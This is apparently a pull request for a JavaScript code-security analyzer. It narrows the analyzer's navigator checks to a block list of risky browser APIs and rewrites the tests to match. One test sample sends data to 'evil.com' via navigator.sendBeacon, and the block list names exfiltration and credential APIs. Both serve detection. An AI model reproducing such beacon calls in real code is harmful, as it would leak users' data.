### PR TITLE
fix: navigator 検出をブロックリスト方式に変更（v0.2.1）

### DIFF
--- a/__tests__/analyzer.test.ts
+++ b/__tests__/analyzer.test.ts
@@ -191,19 +191,63 @@ describe('CodeSecurityService - analyzer', () => {
     })
   })
 
-  describe('異常系 - navigator検出', () => {
-    it('navigator.userAgentアクセスを検出', () => {
+  describe('異常系 - navigator検出（ブロックリスト方式）', () => {
+    it.each([
+      ['sendBeacon', 'navigator.sendBeacon("https://evil.com", data)'],
+      ['geolocation', 'navigator.geolocation.getCurrentPosition(cb)'],
+      ['credentials', 'navigator.credentials.get({ publicKey: {} })'],
+      ['mediaDevices', 'navigator.mediaDevices.getUserMedia({ video: true })'],
+      ['clipboard', 'navigator.clipboard.readText()'],
+      ['serviceWorker', 'navigator.serviceWorker.register("/sw.js")'],
+    ])('navigator.%s へのアクセスを検出', (prop, code) => {
+      const signals = analyzeCodeSecurity(code)
+
+      expect(signals.hasNavigatorAccess).toBe(true)
+      expect(signals.detectedViolations).toEqual(
+        expect.arrayContaining([
+          expect.objectContaining({
+            rule: 'no-navigator-access',
+            severity: 'critical',
+            message: expect.stringContaining(`navigator.${prop}`),
+          }),
+        ])
+      )
+    })
+
+    it.each([
+      ['xr', 'const session = navigator.xr.requestSession("immersive-vr")'],
+      ['userAgent', 'const ua = navigator.userAgent'],
+      ['platform', 'const p = navigator.platform'],
+      ['language', 'const lang = navigator.language'],
+      ['hardwareConcurrency', 'const cores = navigator.hardwareConcurrency'],
+    ])('navigator.%s へのアクセスは検出しない（正当利用）', (_prop, code) => {
+      const signals = analyzeCodeSecurity(code)
+
+      expect(signals.hasNavigatorAccess).toBe(false)
+      expect(signals.detectedViolations.filter(v => v.rule === 'no-navigator-access')).toHaveLength(0)
+    })
+
+    it('typeof navigator !== "undefined" の存在チェックは検出しない', () => {
       const code = `
-        const fingerprint = {
-          userAgent: navigator.userAgent,
-          platform: navigator.platform,
+        if (typeof navigator !== "undefined") {
+          console.log("browser")
         }
       `
 
       const signals = analyzeCodeSecurity(code)
 
+      expect(signals.detectedViolations.filter(v => v.rule === 'no-navigator-access')).toHaveLength(0)
+    })
+
+    it('navigator.xxx = ... の代入は引き続き検出（改ざん防止）', () => {
+      const code = `
+        navigator.sendBeacon = function() {}
+      `
+
+      const signals = analyzeCodeSecurity(code)
+
+      expect(signals.hasGlobalVariableOverride).toBe(true)
       expect(signals.hasNavigatorAccess).toBe(true)
-      expect(signals.detectedViolations.length).toBeGreaterThan(0)
     })
   })
 

--- a/package.json
+++ b/package.json
@@ -1,6 +1,6 @@
 {
   "name": "@xrift/code-security",
-  "version": "0.2.0",
+  "version": "0.2.1",
   "type": "module",
   "description": "Code security analyzer powered by acorn",
   "main": "./dist/index.js",

--- a/src/analyzer.ts
+++ b/src/analyzer.ts
@@ -46,6 +46,20 @@ const KNOWN_SAFE_VARIABLES = [
 ]
 
 /**
+ * navigator のうちセキュリティ上危険なプロパティ
+ * これらのみ no-navigator-access として検出する。
+ * navigator.xr 等の正当利用は許可する。
+ */
+const DANGEROUS_NAVIGATOR_PROPERTIES = [
+  'sendBeacon',       // データ外部送信
+  'geolocation',      // 位置情報取得
+  'credentials',      // 認証情報アクセス
+  'mediaDevices',     // カメラ・マイクアクセス
+  'clipboard',        // クリップボード操作
+  'serviceWorker',    // ServiceWorker登録
+]
+
+/**
  * セキュリティ上重要な API（サプライチェーン攻撃で改ざんされると危険）
  * これらの window.xxx = ... はバンドル依存でも絶対に抑制しない
  */
@@ -717,13 +731,13 @@ export function analyzeCodeSecurity(
         ))
       }
 
-      // navigator.* すべてを禁止
-      if (objectName === 'navigator') {
+      // navigator の危険プロパティのみ検出
+      if (objectName === 'navigator' && propertyName && DANGEROUS_NAVIGATOR_PROPERTIES.includes(propertyName)) {
         signals.hasNavigatorAccess = true
         signals.detectedViolations.push(createViolation(
           'no-navigator-access',
           'critical',
-          `navigator.${propertyName || '*'}へのアクセスは禁止されています（フィンガープリンティング防止）`,
+          `navigator.${propertyName}へのアクセスは禁止されています`,
           node
         ))
       }
@@ -772,22 +786,8 @@ export function analyzeCodeSecurity(
     },
 
     // 5. 変数名収集
-    Identifier(node: any, ancestors: acorn.Node[]) {
+    Identifier(node: any, _ancestors: acorn.Node[]) {
       variableNames.push(node.name)
-
-      // navigator 変数への直接参照も検出
-      if (node.name === 'navigator') {
-        const parent = ancestors[ancestors.length - 2]
-        if (parent?.type !== 'MemberExpression' || (parent as any).object !== node) {
-          signals.hasNavigatorAccess = true
-          signals.detectedViolations.push(createViolation(
-            'no-navigator-access',
-            'critical',
-            'navigatorオブジェクトへのアクセスは禁止されています',
-            node
-          ))
-        }
-      }
     },
 
     // 6. 文字列リテラル収集（StringLiteral → Literal + string ガード）


### PR DESCRIPTION
## Summary
- navigator 検出を全ブロック方式から危険プロパティのみのブロックリスト方式に変更
- `navigator.xr` 等の WebXR 正当利用が誤検知される問題を解消
- パッチバージョンを `0.2.1` に更新

## 変更詳細
- `DANGEROUS_NAVIGATOR_PROPERTIES` 定数を追加（`sendBeacon`, `geolocation`, `credentials`, `mediaDevices`, `clipboard`, `serviceWorker`）
- MemberExpression の navigator 検出を危険プロパティのみに限定
- Identifier の navigator 直接参照検出を削除（`typeof navigator` 等の存在チェックが誤検知していた）
- `navigator.xxx = ...` の代入検出と `navigator.sendBeacon()` の呼び出し検出は維持

## Test plan
- [x] `npm test` — 125 tests passed
- [x] リグレッションテスト — plateau-test, xrcc, xrift-world-template 全て合格

Closes #25

🤖 Generated with [Claude Code](https://claude.com/claude-code)